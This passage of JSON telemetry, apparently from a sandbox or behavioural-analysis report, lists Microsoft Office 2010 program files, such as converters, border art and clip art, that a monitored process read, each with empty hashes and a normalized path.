office\\office14\\convert\\olnote.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\org97.sam", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\pab.sam", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart1.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART14.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart14.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart2.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2String.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\author2string.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\APA.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\bibliography\\style\\apa.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099170.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099172.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099172.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg", "operations": [ "read" ], 